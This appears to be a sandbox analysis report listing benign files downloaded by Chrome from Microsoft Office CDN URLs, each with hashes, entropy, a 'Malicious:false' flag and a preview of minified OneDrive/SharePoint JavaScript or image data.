                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[18],{6138:function(e,t,n){function a(e){return".pbix"===e}n.d(t,{a:function(){return a}})}.,8547:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e.None="None",e.FilterInViewDef="FilterInViewDef",e.MultiSortsInViewDef="MultiSortsInViewDef",e.SortFieldInViewDef="SortFieldInViewDef",e.FilterInQueryParam="FilterInQueryParam",e.SortFieldInQueryParam="SortFieldInQueryParam",e.GroupFieldInQueryParam="GroupFieldInQueryParam",e.NoPermission="NoPermission",e.Unknown="Unknown"}(a||(a={}))}.,6130:function(e,t,n){n.r(t),n.d(t,{getServerData:function(){return S},getServerDataWithPrefetch:function(){return y}});var a=n("tslib_538"),i=n(192),r=n(1543),o=n(1618),s=n(28),c=n(139),d=n(6),l=n(27),u=n(1616),f=n(80),p=n(1544),m=n(6131),_=n(99);function h(e,t){var n=e.HttpRoot||new _.default(t).authority,i=new _.default(n).path,r=(e.listUrlDir||"").slice(0,i.length)===i;return(0,a.q5)((0,a.q5)({},e),{listUrlDir:r?
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (8319)
                                                          Category:downloaded
                                                          Size (bytes):16179
                                                          Entropy (8bit):5.3972120496298155
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:35E769CCF5D48D74909D9655B65BAA23
                                                          SHA1:44FF520A7E85FBA38012E6FFA4949FB232BE34B0
                                                          SHA-256:357033A0FD00C4CD1D9510ABF1BFA9768F79C9F651091E7B03C3461751FD564B
                                                          SHA-512:9FCA91703D3E7A54D9895261A00E86BC6CFE70C887E34D9ED3A63384D13A7F4D18D111B5E1272E706BC87255B51D0F94C2D3ACE0A2FF400E2F17D97A853F2A73
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/1458.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1458],{2951:function(e,t,n){n.d(t,{a:function(){return f}});var a=n("tslib_538"),i=n("react-lib"),r=n(29),o=n(3187),s=n(378),c=n(138),d=n(127),l={beakWidth:16,gapSpace:0,setInitialFocus:!0,doNotLayer:!1,directionalHint:c.a.rightCenter},u=(0,r.a)(),f=i.forwardRef(function(e,t){var n=i.useRef(null),r=(0,d.a)(n,t),c=e.calloutProps,f=e.targetElement,p=e.onDismiss,m=e.hasCloseButton,_=void 0===m?e.hasCloseIcon:m,h=e.isWide,b=e.styles,g=e.theme,v=e.target,y=i.useMemo(function(){return(0,a.q5)((0,a.q5)((0,a.q5)({},l),c),{theme:g})},[c,g]),S=u(b,{theme:g,isWide:h,calloutProps:y,hasCloseButton:_}),D=S.subComponentStyles?S.subComponentStyles.callout:void 0;return function(e,t){i.useImperativeHandle(e,function(){return{focus:function(){var e;return null===(e=t.current)||void 0===e?void 0:e.focus()}}},[t])}(e.componentRef,n),i.createElement(s.a,(0,a.q5)({target:v||f,onDismiss:p},y,{className:S.root,styles:D,hideOverflow:
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (17088)
                                                          Category:downloaded
                                                          Size (bytes):564598
                                                          Entropy (8bit):5.406120558854298
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:043EE75A7F6F0F8213A0C3835312706C
                                                          SHA1:E7770D2D0BFE760B53E61319DC584AE848B34181
                                                          SHA-256:BABD3EB39A63794BB0DAE4B1F18E6C9BF30D633BFD3815A48128CEB452A1DDF1
                                                          SHA-512:68C2C215C8C8EFDF9861F2ECBD0942B36C63DE72ECC26B5BC0A0BBEC34AF1A8AE1B90F5EF793257FE5017CBF901923C2B39ACD4BA1B9CD29CBA2AC2665A2DADD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/file-browser-odb-meta-os/plt.metaosodbfilebrowserdataprefetch.js
                                                          Preview:/*! For license information please see plt.metaosodbfilebrowserdataprefetch.js.LICENSE.txt */.var __webpack_result__;(()=>{var e={283:(e,t,n)=>{"use strict";function a(e){r!==e&&(r=e)}function i(){return void 0===r&&(r="undefined"!=typeof document&&!!document.documentElement&&"rtl"===document.documentElement.getAttribute("dir")),r}var r;function o(){return{rtl:i()}}n.d(t,{a:()=>o,b:()=>a}),r=i()}.,189:(e,t,n)=>{"use strict";n.d(t,{a:()=>s});var a,i=n(0),r="undefined"!=typeof navigator&&/rv:11.0/.test(navigator.userAgent),o={};try{o=window||{}}catch(e){}var s=function(){function e(e,t){var n,a,r,o,s,c;this._rules=[],this._preservedRules=[],this._counter=0,this._keyToClassName={},this._onInsertRuleCallbacks=[],this._onResetCallbacks=[],this._classNameToArgs={},this._config=(0,i.__assign)({injectionMode:"undefined"==typeof document?0:1,defaultPrefix:"css",namespace:void 0,cspSettings:void 0},e),this._classNameToArgs=null!==(n=null==t?void 0:t.classNameToArgs)&&void 0!==n?n:this._className
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:RIFF (little-endian) data, Web/P image
                                                          Category:downloaded
                                                          Size (bytes):22282
                                                          Entropy (8bit):7.987867000618429
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:DA7EF08CA0DC4552CE4498AFBCCD473A
                                                          SHA1:C22C096A78818689272E8D4D0D94A31BBB1AF5DF
                                                          SHA-256:C958FEC1BEB0AD85C367CC63C7BAA2138789061A7FECF4AF0902BB8DD7C51701
                                                          SHA-512:B5185328E445C2BDD373BA66080942AA010869BD28911B2EB1359917517C62A1D95747B7F2DE671864E6F560E4FD7FABD8B966CBA6B37E264E649D57F55A0782
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_recent_v3_dark.webp
                                                          Preview:RIFF.W..WEBPVP8X..............ALPH.......m.H...<...c....O....xP....H.N...$.$.X7.J..hRAf..d...7.w-GA.6L.....!"& ..`..:.*,.....o...HES.....y..l.mg.........q......]..efFG.....5..s...}^.K....In.fIQ.xh....#..v$.$.T.....B.0.Q...*.#..d.a.&A.....|..$.....!;..=..sN.9.n6..~.m.m.m.~..d..9g<]...z<.'.'S.."..m+q+.Qq......o.....l.c........?..:...z<L8......?%.`.U.~..A..}..........WR.=(.;.F...j.N...N.9#5..VR.k.0...;...P@I...b`.Hw..*.......Y..9.:*.u....B...E....4Y...r....u.ze..SC....kU...o.:...b_...J$!...6z..k.A....[v.L.O...\4.mg.v*.Q..3......z.2U..L:).f9@...d...'..."..I..EI..1..#d.]...G....C.&.8v.[.xJfoVg.^.....t..w.l.+C...Wh...C..F.MTj.U.^.P9.y...)..Zm.....7.]Q3..6\IDiQR.,.:".H.x.'..X.-.9.P...p...,P...BW%^Z.s(....=....].8..Q.......$.J...k..[g\...p.B...'""....a..P...Ed..J..`..lAX...r,yHN."....iDA.1..i..y..Y=...T...a.....)t......V..v.I.... ...b5.".bElAy.C(C9O..........1.!....j4.T[....I.e.^.."h0OSP...H*...4C.b..........$..V.]....ea....Z..h.........3......V.I
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (11546)
                                                          Category:downloaded
                                                          Size (bytes):335660
                                                          Entropy (8bit):5.4453868168873925
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:33ECE2BA7E9B254A237D1350C7423DA5
                                                          SHA1:4AEEBF6231B59DB2BEA265D1A66AC51C52DE5136
                                                          SHA-256:E18A6A14B8267F105BE2BFD22A09263CCD728B756F5D5B309EEF7A58B2A10A0B
                                                          SHA-512:DFED88255DCFB333447EBCF08459C3BEACCD8651D0F59E7536804331A4A7FD8B1561DE15535C97377E4CD256DA35047D78AC8E07611FF2A47390732454ADD9F2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/file-browser-spo-spartan/plt.spofilebrowserspartan.js
                                                          Preview:/*! For license information please see plt.spofilebrowserspartan.js.LICENSE.txt */.var __webpack_result__;(()=>{"use strict";var e=[(e,t,n)=>{n.r(t),n.d(t,{__assign:()=>r,__asyncDelegator:()=>S,__asyncGenerator:()=>y,__asyncValues:()=>D,__await:()=>v,__awaiter:()=>l,__classPrivateFieldGet:()=>w,__classPrivateFieldSet:()=>E,__createBinding:()=>f,__decorate:()=>s,__exportStar:()=>p,__extends:()=>i,__generator:()=>u,__importDefault:()=>O,__importStar:()=>C,__makeTemplateObject:()=>I,__metadata:()=>d,__param:()=>c,__read:()=>_,__rest:()=>o,__spread:()=>h,__spreadArray:()=>g,__spreadArrays:()=>b,__values:()=>m});var a=function(e,t){return a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},a(e,t)};function i(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function n(){this.constructor=e}a(e,t),e.p
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (44967)
                                                          Category:downloaded
                                                          Size (bytes):52740
                                                          Entropy (8bit):5.394624968679837
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:0518B0F403672F8B291E33EB69D9F91D
                                                          SHA1:D5A016C5CEDBFA2D5E9430AB0E46BB866222649C
                                                          SHA-256:65F41799AADC6CD9E6AF373595CF834C16762C4E87A31CB74A2398BD327ED357
                                                          SHA-512:246500C177F3B6EB34CBAC2C4A7D77B069CD08311B133077940AE3701CE58C261AC35CF8A22C1937D8C3BBBA9F396FA0201CF8505FE1023B1990827070675E79
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/179.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[179],{2196:function(e,t,n){n.r(t),n.d(t,{ContextualControlHandlersProvider:function(){return u},ControlHandlerProvider:function(){return l},RootContextualControlHandlerBridge:function(){return r.b},controlHandlersMemoizer:function(){return d},createContextualControlHandlerProvider:function(){return r.c},createUseElementsWithContextualControlHandlers:function(){return r.d},renderChildrenWithControlHandlers:function(){return f},renderElementsWithContextualControlHandlers:function(){return m},useComposedControlHandlers:function(){return _},useElementsWithContextualControlHandlers:function(){return p}});var a=n("tslib_538"),i=n("react-lib"),r=n(94),o=n(1),s=n("fui.util_175"),c=n(44),d=(0,s.uV)(function(e){return(0,s.uV)(function(t){return(0,a.q5)((0,a.q5)({},e),(0,c.b)(t,function(t,n){var a=o.a.get(n),i=e[a.id];return i&&a.compose(t,i)||t}))})});function l(e){var t=e.controlHandlers;return p(e.children,t)}functio
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (30298)
                                                          Category:downloaded
                                                          Size (bytes):105812
                                                          Entropy (8bit):5.391818966916497
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:4EDE79987F52C99D7B570FE77436747E
                                                          SHA1:B9C4251C30ADBAE5F6BD532F37109E82DA414E7C
                                                          SHA-256:715D8C6EC761B3051A58AC9EE1AB704F7C3587F31159C289372A30AE5103F2F2
                                                          SHA-512:582DA4533516084811FC7ED2C03F7E80226C6376C2C10E1334188D8C975B6A84647257E96CEC12CA5FBDCC487555969D39D9151486E54498BF11ACEED45420BF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://shell.cdn.office.net/shellux/suiteux.shell.otellogging.3c08de1cfa6738ba6840.js
                                                          Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_otellogging_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["otellogging"],{69691:function(n,t,e){var r=e(92855),i=e(41230),o=e(54800),u=e(59177),a=e(68128),c=e(78939),s=e(85788),f=e(69988),l=e(25855),d=function(n){function t(){var e=n.call(this)||this;return e.pluginVersionStringArr=[],(0,i.A)(t,e,(function(n,t){n.logger&&n.logger.queue||(n.logger=new o.wq({loggingLevelConsole:1})),n.initialize=function(e,r,i,s){(0,u.r2)(n,(function(){return"AppInsightsCore.initialize"}),(function(){var u=n.pluginVersionStringArr;if(e){e.endpointUrl||(e.endpointUrl=f.S);var l=e.propertyStorageOverride;!l||l.getProperty&&l.setProperty||(0,a.$8)("Invalid property storage override passed."),e.channels&&(0,a.Iu)(e.channels,(function(n){n&&(0,a.Iu)(n,
                                                          No static file info